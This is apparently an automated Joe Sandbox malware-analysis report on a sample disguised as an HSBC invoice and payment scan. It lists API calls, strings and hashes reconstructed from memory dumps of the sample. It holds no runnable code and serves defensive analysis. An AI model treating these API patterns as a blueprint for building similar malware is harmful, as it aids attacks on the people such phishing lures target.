                    Similarity
                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                    • String ID: X
                    • API String ID: 774024439-3081909835
                    • Opcode ID: c8903154537a1fd99998bada6f4fd8eea74b5648e84f3c842bff80948a966289
                    • Instruction ID: 3f7b3c820d604e8e486564f51445104b57d4e985b366d91d66208aaf1accc5fe
                    • Opcode Fuzzy Hash: c8903154537a1fd99998bada6f4fd8eea74b5648e84f3c842bff80948a966289
                    • Instruction Fuzzy Hash: 9DC18F716083449FC724EF24C881A6AB7E4FF85314F14596DF89DAB2A2DB70ED45CB82
                    Function 00ED8D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00ED85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00ED8608
                      • Part of subcall function 00ED85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00ED8612
                      • Part of subcall function 00ED85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00ED8621
                      • Part of subcall function 00ED85F1: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00ED8628
                      • Part of subcall function 00ED85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00ED863E
                    • GetLengthSid.ADVAPI32(?,00000000,00ED8977), ref: 00ED8DAC
                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00ED8DB8
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00ED8DBF
                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00ED8DD8
                    • GetProcessHeap.KERNEL32(00000000,00000000,00ED8977), ref: 00ED8DEC
                    • HeapFree.KERNEL32(00000000), ref: 00ED8DF3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Heap$Process$AllocateInformationToken$CopyErrorFreeLastLength
                    • String ID:
                    • API String ID: 169236558-0
                    • Opcode ID: 205748ead31ebe9d9579aa59ba5eec25301e91ed42b7a79930ffd87e0d0e0def
                    • Instruction ID: ca72b9217ee1cdd1fb8f83c4093a2fd8830bb7e407a5339223b4e9e516a06dab
                    • Opcode Fuzzy Hash: 205748ead31ebe9d9579aa59ba5eec25301e91ed42b7a79930ffd87e0d0e0def
                    • Instruction Fuzzy Hash: 3F11DC31500608FFDB209FA4CD08BAE7BBEFF54319F10412AE885A3291CB32A905DB60
                    Function 00F0C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E812F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E8134D
                      • Part of subcall function 00E812F3: SelectObject.GDI32(?,00000000), ref: 00E8135C
                      • Part of subcall function 00E812F3: BeginPath.GDI32(?), ref: 00E81373
                      • Part of subcall function 00E812F3: SelectObject.GDI32(?,00000000), ref: 00E8139C
                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00F0C1C4
                    • LineTo.GDI32(00000000,00000003,?), ref: 00F0C1D8
                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00F0C1E6
                    • LineTo.GDI32(00000000,00000000,?), ref: 00F0C1F6
                    • EndPath.GDI32(00000000), ref: 00F0C206
                    • StrokePath.GDI32(00000000), ref: 00F0C216
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                    • String ID:
                    • API String ID: 43455801-0
                    • Opcode ID: 4842024e85c54e6a6426bc48ce1a7651dff871d47c83c25278532fdef16a1b8c
                    • Instruction ID: 4c4a2550992616aeb1f60c0e9dc231d8b1664d5a5d73b4a9587ab74385075c7e
                    • Opcode Fuzzy Hash: 4842024e85c54e6a6426bc48ce1a7651dff871d47c83c25278532fdef16a1b8c
                    • Instruction Fuzzy Hash: 2811097640014CBFDB119F90DC88FAA7FADFF19364F048021BE189A5A1C7719D59EBA0
                    Function 00EA03A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00EA03D3
                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00EA03DB
                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00EA03E6
                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00EA03F1
                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00EA03F9
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EA0401
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Virtual
                    • String ID:
                    • API String ID: 4278518827-0
                    • Opcode ID: bd5a627f728c07e4537b8d571914230669780029d7ef802dc93fb0d1a2bf35c2
                    • Instruction ID: 94c2afdbd8c9965763a72eb67f687946f27249bfc0c1f16a8e2ae9908a5ad908
                    • Opcode Fuzzy Hash: bd5a627f728c07e4537b8d571914230669780029d7ef802dc93fb0d1a2bf35c2
                    • Instruction Fuzzy Hash: 89016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A868CBE5
                    Function 00EE568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                    Download Yara Rule
                    APIs
                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00EE569B
                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00EE56B1
                    • GetWindowThreadProcessId.USER32(?,?), ref: 00EE56C0
                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EE56CF
                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EE56D9
                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EE56E0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                    • String ID:
                    • API String ID: 839392675-0
                    • Opcode ID: f559cc35d9965d6e1e42f62ca53bbef22aae038f583f97f9407b5af05b176697
                    • Instruction ID: 217a4be08c786e9b55c9fcf2f70d8771d4b6e338990c9fbd656a01b13140547c
                    • Opcode Fuzzy Hash: f559cc35d9965d6e1e42f62ca53bbef22aae038f583f97f9407b5af05b176697
                    • Instruction Fuzzy Hash: F8F01D3224115DBBE7315BA29C0DEAB7A7CFBC6B15F000169FA05D14509AA11A0596B5
                    Function 00EE74D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • InterlockedExchange.KERNEL32(?,?), ref: 00EE74E5
                    • RtlEnterCriticalSection.NTDLL(?), ref: 00EE74F6
                    • TerminateThread.KERNEL32(00000000,000001F6,?,00E91044,?,?), ref: 00EE7503
                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00E91044,?,?), ref: 00EE7510
                      • Part of subcall function 00EE6ED7: CloseHandle.KERNEL32(00000000,?,00EE751D,?,00E91044,?,?), ref: 00EE6EE1
                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00EE7523
                    • RtlLeaveCriticalSection.NTDLL(?), ref: 00EE752A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                    • String ID:
                    • API String ID: 3495660284-0
                    • Opcode ID: b02aefe65aa64325379c1a626878d5065da5c3f3f2a80887142a41fc9805d90c
                    • Instruction ID: d5517d2f7e880c7739bb27479eb3b115607d3d912f206ceda49089b1f6fbe06c
                    • Opcode Fuzzy Hash: b02aefe65aa64325379c1a626878d5065da5c3f3f2a80887142a41fc9805d90c
                    • Instruction Fuzzy Hash: 22F0823A14071AEBDB312B64FC8C9EB7B3AFF45302B001531F642A18B4CB755909DB90
                    Function 00EF8902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                    Download Yara Rule
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 00EF8928
                    • CharUpperBuffW.USER32(?,?), ref: 00EF8A37
                    • VariantClear.OLEAUT32(?), ref: 00EF8BAF
                      • Part of subcall function 00EE7804: VariantInit.OLEAUT32(00000000), ref: 00EE7844
                      • Part of subcall function 00EE7804: VariantCopy.OLEAUT32(00000000,?), ref: 00EE784D
                      • Part of subcall function 00EE7804: VariantClear.OLEAUT32(00000000), ref: 00EE7859
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                    • API String ID: 4237274167-1221869570
                    • Opcode ID: 8b3390dee910f842c17fef03c357808f2601ab4ffdd5cf9f9654971d534c576f
                    • Instruction ID: c8294cecde5d1c6b220264bf8944e65c001ca9d3a8d7dc03e22de38df69d085e
                    • Opcode Fuzzy Hash: 8b3390dee910f842c17fef03c357808f2601ab4ffdd5cf9f9654971d534c576f
                    • Instruction Fuzzy Hash: 92919E75608305DFC714EF24C58496ABBE4EFC8314F04596EF99AAB362DB30E906CB52
                    Function 00EE2F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E9FEC6: _wcscpy.LIBCMT ref: 00E9FEE9
                    • _memset.LIBCMT ref: 00EE3077
                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00EE30A6
                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00EE3159
                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00EE3187
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                    • String ID: 0
                    • API String ID: 4152858687-4108050209
                    • Opcode ID: c82cd615666a32182151034deb029f8e0f6cf2e147beae7e89ddaae4761c2137
                    • Instruction ID: 08be7c0ed94e9063c25ab368cb63f96f39630a16b112c7e37db4567d5cbfef26
                    • Opcode Fuzzy Hash: c82cd615666a32182151034deb029f8e0f6cf2e147beae7e89ddaae4761c2137
                    • Instruction Fuzzy Hash: 7251013160A3889ED7249F39C848A6BBBE8EF45368F04292DF895F3191DB70CE449752
                    Function 00EE2C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00EE2CAF
                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00EE2CCB
                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00EE2D11
                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F46890,00000000), ref: 00EE2D5A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Menu$Delete$InfoItem_memset
                    • String ID: 0
                    • API String ID: 1173514356-4108050209
                    • Opcode ID: 385b9620bee1c240a08213c18193988f96c8181690dfd45458d8d5444bbf31f6
                    • Instruction ID: 0e332d9a0cf7b2917a3397d2f5af398d3ef5dbde3cd8ed4621ff50acbb240770
                    • Opcode Fuzzy Hash: 385b9620bee1c240a08213c18193988f96c8181690dfd45458d8d5444bbf31f6
                    • Instruction Fuzzy Hash: 2D41BF302043859FD724DF25DC44B5ABBE8BF85324F14461DFA65A7291D770E904CB92
                    Function 00EFDAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                    Download Yara Rule
                    APIs
                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00EFDAD9
                      • Part of subcall function 00E879AB: _memmove.LIBCMT ref: 00E879F9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: BuffCharLower_memmove
                    • String ID: cdecl$none$stdcall$winapi
                    • API String ID: 3425801089-567219261
                    • Opcode ID: dc54d557f07fec2a161132db5aa4488a24c0f6d5a967f3964ae1222a794b1173
                    • Instruction ID: 55cda04dbcbe8e06526932b65b35a76ffbcd153038cfa0ebc329876e8158edbf
                    • Opcode Fuzzy Hash: dc54d557f07fec2a161132db5aa4488a24c0f6d5a967f3964ae1222a794b1173
                    • Instruction Fuzzy Hash: 7831C3715082199BCF00EF54CC809FEB7F5FF05324B10962AE969B7691CB71E906CB80
                    Function 00ED9372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                      • Part of subcall function 00EDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00EDB0E7
                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00ED93F6
                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00ED9409
                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00ED9439
                      • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSend$_memmove$ClassName
                    • String ID: ComboBox$ListBox
                    • API String ID: 365058703-1403004172
                    • Opcode ID: e685f7e596a041231a7b72bc6195df4b24ef59627d8dc8e3391d9597f07f54ef
                    • Instruction ID: 3dfbeb1a900a1280f0e93640088c16a2ef908f2c6cbf283b4a881b5d8ad8087a
                    • Opcode Fuzzy Hash: e685f7e596a041231a7b72bc6195df4b24ef59627d8dc8e3391d9597f07f54ef
                    • Instruction Fuzzy Hash: 0C21E471A00108AEDB14AB70CC858FFB7B8EF05760B14521AF929B72E2DB75594B9610
                    Function 00F06656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E81D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E81D73
                      • Part of subcall function 00E81D35: GetStockObject.GDI32(00000011), ref: 00E81D87
                      • Part of subcall function 00E81D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E81D91
                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00F066D0
                    • LoadLibraryW.KERNEL32(?), ref: 00F066D7
                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00F066EC
                    • DestroyWindow.USER32(?), ref: 00F066F4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                    • String ID: SysAnimate32
                    • API String ID: 4146253029-1011021900
                    • Opcode ID: 1f65ee54165fd0e6d21ffc91710dcadec73103e690703dccea6c884e7b0ebc0d
                    • Instruction ID: e5aea13638594fa44174b7ab1d1b1f0f7b07edd320d8add2cd53446f9d045672
                    • Opcode Fuzzy Hash: 1f65ee54165fd0e6d21ffc91710dcadec73103e690703dccea6c884e7b0ebc0d
                    • Instruction Fuzzy Hash: C1218B7160020AABEF104F64EC80EAB37ADEB59378F104629F911DA1E0DB72CC61B760
                    Function 00EE703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                    Download Yara Rule
                    APIs
                    • GetStdHandle.KERNEL32(0000000C), ref: 00EE705E
                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00EE7091
                    • GetStdHandle.KERNEL32(0000000C), ref: 00EE70A3
                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00EE70DD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CreateHandle$FilePipe
                    • String ID: nul
                    • API String ID: 4209266947-2873401336
                    • Opcode ID: 1cc25b45962437660aaaad41616913568c81663800d0cda5a32aa34b3c083ea8
                    • Instruction ID: e2397e376cdfc7955bff22e8446b5b67d6d49d8717c18912b049993d53ec1a58
                    • Opcode Fuzzy Hash: 1cc25b45962437660aaaad41616913568c81663800d0cda5a32aa34b3c083ea8
                    • Instruction Fuzzy Hash: BE217C7460424DABDF209F6AE805A9A7BA8BF54724F205A19F8E0E72D0E7B09940DB50
                    Function 00EE710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                    Download Yara Rule
                    APIs
                    • GetStdHandle.KERNEL32(000000F6), ref: 00EE712B
                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00EE715D
                    • GetStdHandle.KERNEL32(000000F6), ref: 00EE716E
                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00EE71A8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
